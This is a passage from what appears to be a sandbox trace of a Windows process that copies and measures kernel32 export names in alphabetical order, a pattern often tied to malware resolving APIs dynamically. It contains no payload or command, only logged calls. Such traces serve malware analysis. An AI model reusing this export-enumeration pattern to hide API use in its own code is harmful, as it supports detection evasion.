(in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.781] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.781] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.781] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.781] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.781] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.781] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.781] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.781] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.781] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.781] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.781] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.781] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.781] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.781] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.781] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.781] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.781] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.782] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.782] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.782] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.782] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.782] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.782] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.782] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.782] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.782] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.782] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.782] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.782] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.782] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.782] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.782] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.782] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.782] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.782] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.782] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.782] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.783] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.783] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.783] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.783] lstrlenA (lpString="BEEP") returned 4 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.783] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.783] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.783] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.783] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.783] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.783] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.783] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.783] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.783] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.783] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.783] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.783] lstrlenA (lpString="CANCELIO") returned 8 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.783] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.783] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.783] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.783] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.783] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.784] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.784] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.784] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.784] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.784] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.784] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.784] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.784] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.784] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.784] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.784] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.784] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.784] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.784] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.784] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.784] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.784] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.784] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.784] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.784] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.785] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.785] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.785] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.785] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.785] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.785] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.785] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.785] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.785] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.785] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.785] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.785] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.785] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.785] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.785] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.785] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.785] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.785] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.785] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.785] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.786] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.786] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.786] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.786] lstrlenA (lpString="COPYFILEA") returned 9 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.786] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.786] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.786] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.786] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.786] lstrlenA (lpString="COPYFILEW") returned 9 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.786] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.786] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.786] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.786] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.786] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.786] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.786] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.786] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.786] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.786] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.786] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.787] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.787] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.787] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.787] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.787] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.787] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.787] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.787] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.787] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.787] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.787] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") 